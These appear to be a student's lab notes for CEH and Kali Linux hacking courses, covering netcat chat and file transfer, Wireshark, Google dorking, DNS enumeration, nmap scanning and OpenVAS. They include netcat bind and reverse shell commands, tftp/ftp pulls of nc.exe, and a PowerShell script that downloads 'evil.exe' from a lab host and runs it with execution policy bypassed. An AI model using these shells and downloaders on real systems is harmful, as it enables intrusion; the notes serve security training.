Kali Linux Labs for CEH Course
and Hacking with Kali Linux Course

#######################
Lab 01 Compuering the PI  Video 1-4
#######################

#######################
Lab 02 Client Server Communications Page 20
#######################
=======================
Step 1 Configure Windows 10 with xamp and ncat
=======================
Step 2 Enable the Murcery email server
=======================
Step 3 Check and Cummunicate with open port 110 
=======================
  nc -vn 10.1.0.x 110 - check if a port is open 
  -v -verbose output
  -n -numeric data, no dns
user bob
pass password 
======================
Step 4 Chat bwtween linux aind windows -listen on port 4444 and connect
======================
Anything you type will be mirrored to the windows computer 
On Windows  nc -nlvp 4444 -listen on port 4444 on Windows machine
On Linux nc -nv 10.1.0.x 4444 -connect to windows from linux
Anything typed on either computer will be transfered
=====================
Step 5 Transfere files
=====================
On Windows  nc -nlvp 4444 > incoming.exe - widnows computer redirects incomming to file
On lInux  nc -nv 10.1.0.136 4444 < /usr/share/windows-binaries/wget.exe
  Very cool
=====================
Step 6 Bind Shell - cmd
=====================
On Windows  nc -nlvp 4444 -e cmd.exe - windows is listening on 4444 with cmd ready
On Linux  nc -nv 10.1.0.136 4444  - linux will grab the output of cmd
  Also very cool
=====================
Step 7 Reverse TCP Shell
=====================
On Windows  nc -nlvp 4444 - windows computer is listening
ON linux    nc -nv 10.1.0.136 4444 -e /bin/bash
  Reverse back to linux box -back at you
=====================
Step 8 Ncat - Encrypted Reverse TCP Shell from video
=====================
On Windnows ncat -nlvp 4444 -e cmd.exe --allow 10.1.0.127 --ssl
On Linux    ncat -v 10.1.0.136 4444 --ssl

#####################
Lab 03 Wireshark  Page 65
#####################
=====================
Step 1  Capture filter for POP3 traffic
=====================
  Load Wireshark and Capture 110 traffic
  Capture pop3 traffic only 
  nc -vn 10.1.0.x 110
  Logon to server, User Don, Pass Don,
  Disconnect traffic
  Examine Traffic
=====================
Step 2  Capture all traffic - look at POP3 traffic
=====================
  Load Wireshark and Catprue all Traffic
  Apply Deisplay Filter
  tcp.port == 110
  Examine 3-way handshake and POP3 Traffic
  nc -vn 10.1.0.136 110
  Logon to server, User Don, Pass Don,
  Disconnect traffic
  Examine Traffic
  Choose 'Follow TCP Stream'
====================
Step 3 Capture a chat session	
====================
  Load Wireshark Capture all traffic
  Create chat session
  On Windows  nc -nlvp 4444 
  On Linux nc -nv 10.1.0.136 4444 
  Display filter ip.addr == 10.1.0.136
  Find tcp protocol
  Follow TCP Stream
  Choose 'Follow TCP Stream' to examine Traffic
===================
Step 4	Transfer a file
===================
  Load a new wireshark session
  Transfer a file
  On Windows  nc -nlvp 4444 > wget.exe 
  On lInux  nc -nv 10.1.0.136 4444 < /usr/share/windows-binaries/wget.exe
  Display filter ip.addr == 10.1.0.136
  Follow TCP stream
  Examine Traffic and analyze
==================
Step 5	Capture bind shell traffic
==================
  Load Wireshark and capture traffic	
  Exec bind shell command
  On Windows  nc -nlvp 4444 -e cmd.exe 
  On Linux  nc -nv 10.1.0.136 4444  
  Display Filter ip.addr == 10.1.0.136
  Examine Traffic
  Follow TCP Stream
=================
Step 6  Load Wireshark and capture traffic
=================
  Exec Encrypted bind shell
  On Windnows ncat -nlvp 4444 -e cmd.exe --allow 10.1.0.127 --ssl
  On Linux    ncat -v 10.1.0.136 4444 --ssl
  Display Filter ip.address == 10.1.0.136
  Examine Traffic
  Follow TCP Stream
  Examine Traffic	

#################
Lab 04 Information Gathering, Passive  Page 76
#################
=================
Step 1 Keepnote 
=================
  Create a folder for out data
  Create a New Progect
  Create Pages for the project
  Change Font
	Edit-Prefferences-Look and Feel
	and Nootbook Options, choose notebook
  Go over cut and past options
================
Screen Catpure Keyboard Shotcuts
================
  ctrl+print  - Print Screen
  alt-print   - Print Windows
  shift-print - Print Area
  Alt-Tab     - Cycle through programs
Show the location of captues and
inport them into keepnote
================
Step 2 Google Hacking-Passive Information Gethering
================
  site:cwidaho.cc  16,800 pages  -limit the information to the domain requested
   119 pages  -site:"www.domain.com"  -Exclude www.domain.dom in search to get only subdomains
  site:cwidaho.cc filetype:pdf 
  site:www.cwidaho.cc filetype:pdf
  intitle:"VNC viewer for Java"  -search for vnc in the title
  inurl:"/control/userimage.html" -search for files in urls
  inurl:php? intext:CHARACTER_SET,COLLATIONS intitle:phpmyadmin  -search for misconfigured databases using phpmyadmin
  intitle:"N3t" filetype:php undetectable  -php backdoor of compromized computers
  Get list of google searches
  Search Google for ghdb
  GHDB hosted by offensive security
  www.exploit-db.com/google-dorks/
Complete hacking list
  http://airodump.net/complete-google-hacks-list/
================
Step 3  Email Harvesting
================
  theharvester -d cwidaho.cc -b google 
  bing
  yahoo
  baidu
  linkedin
  dogpilesearch
  twitter

theharvester -d cwidaho.cc -b all > mycwiinfo.txt
================
Step 4 WhoIS
================
Whois cwidaho.cc > into.txt -dms lookup
whois ip address > info.txt -reverse lookup
================
Step 5 Recon-ng  rwbnetsec video from youtube
================
################
Lab 05 Active Information Gathering Page 96 
DNS Enumerating - IP Address, Server names and functions, email address...
host, dig and nslookup dnsenum and dnsrecon
################
================
Step 1 Host Command
================
  host -t ns cwidaho.cc -find dns servers
	     megacorp.dom
  host -t mx cwidaho.cc -find mail servers
  host -t A cwidaho.cc - find ipv4 host records
  host -t AAAA cwidaho.cc -find ipv6 host records
  host www.cwidaho.cc -find other host names
==============
Bash script
  Create dnslist.txt
www
ftp
mail
proxy
router
admin
www2
my
firewall
mx
pop3
imap
================
  Create script forward.sh
  nano forward.sh
#!/bin/bash 
 for name in $(cat dnslist.txt);do
     host $name.cwidaho.cc |grep "has address" |cut -d " " -f1,4
  done
================
Step 2 DNS Zone Transfer Page 99
================
Find the dns server
host -t ns cwidaho.cc
host -t ns megacorp.dom

Attempt Zone Transfer
host -l cwidaho.cc molly.ns.cloudflare.com.
host -l cwidaho.cc kip.ns.cloudflare.com.
================
Sript looks like this
nano axfer.sh
#!/bin/bash
for server in $(host -t ns megacorpone.com |cut -d " " -f4);do
  host -l megacorpone.com $server;
done
================
A smarter script for all domains would look like this
nano axferall.sh
#!/bin/bash
# Simple Zone Transfer Bash Script
# $1 is the first argument given after the bash script
# Check if argument was given, if not, print usage
if [ -z "$1" ]; then
echo "[*] Simple Zone transfer script"
echo "[*] Usage : $0 <domain name> "
exit 0
fi
# if argument was given, identify the DNS servers for the domain
for server in $(host -t ns $1 |cut -d" " -f4);do
# For each of these servers, attempt a zone transfer
host -l $1 $server |grep "has address"
done
================
Step 3 DNS Zone Transfers - dnsrecon
================
dnsrecon -d domain name -t axfr > text.file
================
Step 4 DNS Zone Transfer - dnsenum
================
dnsenum domain name > text.file
================
Step 5 Demetry 
================
dmetry -winsepfbo cwidaho.cc > filename
================
Step 6 DNS Stuff
================ hello
www.dnsstuff.com 
================
Step 7 Fierce
================
fierce -dns cwidaho.cc > filename
================
Step 8 Discovery scripts
================
git clone https://github.com/leebaird/discover.git
################
Lab 06 IP Scanning and Port Scanning Page Page 111
################
================
Step 1 Connecting to VPN
================
  apt-get install pptp-linux
  nano /etc/ppp/peers/vpn
pty "pptp 172.30.30.1 --nolaunchpppd --debug"
name vpnuser01
password Vpnuser!1
remotename PPTP
require-mppe-128
require-mschap-v2
refuse-eap
refuse-pap
refuse-chap
refuse-mschap
noauth
debug
persist
maxfail 0
defaultroute
replacedefaultroute
usepeerdns
================
pon vpn
================
Step 2 -Client Discovery - Ping Sweep Batch File 
================
  Pingsweep Bash File
#!/bin/bash
for ip in $(seq 1 254); do
ping -c 1  172.100.100.$ip |grep "bytes from" |cut -d" " -f4|cut -d";" -f1&
done
===============
pingsweep.sh > pingsweep.txt
nbtscan 172.100.100.1-254
===============
Step 3 Nmap - Finding the Correct OS
===============
  nmap -O 172.100.100.10 -OS is correct
  nmap -O 172.100.100.11 -OS is correct
  nmap -O 172.100.100.13
===============
  nmap -O 172.100.100.12 - does not know
  nmap -O --osscan-guess 172.100.100.12 - will guess the os correctly
  nmap -O --osscan-guess --fuzzy 172.100.100.12  - still not correct answer
  nmap -Pn 172.100.100.12 - This is a mail server, most likely microsoft
  nmap -A -v -F 172.100.100.12 - This has found a Server 2012
===============
  nmap -O 172.100.100.14
  nmap -A -v -F 172.100.100.14 -This will find it
===============
  nmap -O 172.100.100.20
  nmap -A -v -F 172.100.100.20 -This will find it
===============
  nmap -O 172.100.100.21
  nmap -O 172.100.100.22
  nmap -O 172.100.100.23
  nmap -O 172.100.100.25
===============
  nmap -A -F 172.100.100.100
  nmap -A -F 172.100.100.101
  nmap -A -F 172.100.100.102
  nmap -A -F 172.100.100.103
  nmap -A -F 172.100.100.104
  nmap -A -F 172.100.100.105
  nmap -A -F 172.100.100.106
===============
Step 4 Other nmap commands issues
===============
Nmap issues
  nmap -sn 172.100.100.1-254 - Ping Scan, Ping Sweep
  nmap -p 80 172.100.100.1-254 -oG web-sweep.txt  - scan or open port 80 with output file
  nmap -sP -PS22,3389 172.100.100.10
  nmap -sV 172.100.100.1-254  -full connect scan
  nmap -sT --top-ports 20 172.100.100.10 -oG top-port-sweep.txt  - Connect scan of top 20 ports
===============
Step 5 Hping3 - finding open ports
===============
hping3 --scan 0-100 -S 172.100.100.10
===============
Step 6 NSE Scripts
===============
  /usr/share/nmap/scripts
  Scripts of note:
  nmap 172.100.100.10 --script=address-info.nse  - fast scan, does syn-stealth scan as well
  nmap 172.100.100.20 --script=smb-os-discovery.nse
  nmap 172.100.100.11 --script=dns-zone-transfer -p 53 dc01.megacorp.dom - dns zone tranfer

###############
Lab 07 Service Enumeration
###############
enum4linux -a -v 172.100.100.10

###############
Lab 08 Vulnerability Scanning  page 119
###############
===============
Step 1 - Vega
===============
Install and run Vega

===============
Step 2 Configure OpenVas  Page 139
===============
OpenVAS Initial Setup
OpenVAS Feeds Update
OpenVAS Start
https://localhost:9392
Except Secuirty Warnings
Login with admin and password
Change you Login Password
Select Administration
   Select User
   Select the Wrench Icon and Change Password
Update your feeds
   Click on Administration Menu
   Choose the feed and sync feed
===============
Step 3 Set Target and Task
===============
Configure a Scan Target
   Select to configuration menu
     Select Targets Item
     Select Start Icon to add new target
     Enter Name and Host IP of Target
     Select the Create Target button
Create a New Task which will perform the scan
   Select Scan Management Item
     Select Task
     Select Start Icon to create a new task
     Eneter a Name of the scan
     Select the Target
     Select Yes to add to assesset management
     Select No for Alternate Task
     Select Scan Config pull down
     Select Full and Very Deep Ultimate
     Select Create Task button
===============
Step 4 Launch the Scan
===============
Click on Play button to start scanning the target
Configuration Options
   Configurateion Menu
      Port List
      Click on * icon to add custom port range
         T=TCP and U=UDP
      Alert, select * to add new alert
===============
Step 5 Analyze the Report
===============
################
Lab 09 USB Rubber Ducky and SET
################

################
Lab 10 Wireless Hacking
################

################
Lab 11 Vail-Evasion
################

################
Lab 12 - Exploits
###############
Exploits -search for exploits
searchsploit slmail
searchsploit reverse - search for reverse shell and such
www.exploit-db.com
www.securityfocus.com

===============
TFTP File Uploads from windows to linux
  Setup tftp on Kali Linux
  mkdir /tftp -Make an tftp directory
  atftpd --daemon --port 69 /tftp -start the tftp serverice
  cp /usr/share/windows-binaries/nc.exe /tftp/  -copy the nc.exe for windows

  Setup on Windows
  tftp -i 192.168.10.5 get nc.exe
  
===============
FTP file uploads form windows to linux
  apt-get update && apt-get install pure-ftpd
  Script to create fpt user account
  Script name setup.ftp
#!/bin/bash
groupadd ftpgroup 
useradd -g ftpgroup -d /dev/null -s /etc ftpuser 
pure-pw useradd offsec -u ftpuser -d 
/ftphome pure-pw mkdb 
cd /etc/pure-ftpd/auth/ 
ln -s ../conf/PureDB 60pdb 
mkdir -p /ftphome 
chown -R ftpuser:ftpgroup /ftphome/ 
/etc/init.d/pure-ftpd restart

chmod 755 setup.ftp

On wondows connected shell execute the following

echo open 192.168.10.5 21 > ftp.txt
echo ftp >> ftp.txt 
echo ftp >> ftp.txt 
echo bin >> ftp.txt 
echo GET nc.exe >> ftp.txt 
echo bye >> ftp.txt 
ftp -s:ftp.txt

===============  page 188
Powershell
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-­-Object System.Net.WebClient >>wget.ps1
echo $url = "http://192.168.10.5/evil.exe" >>wget.ps1 
echo $file = "new-­-exploit.exe" >>wget.ps1 
echo $webclient.DownloadFile($url,$file)  >>wget.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1


===============  page 190
Privelage Escalation






















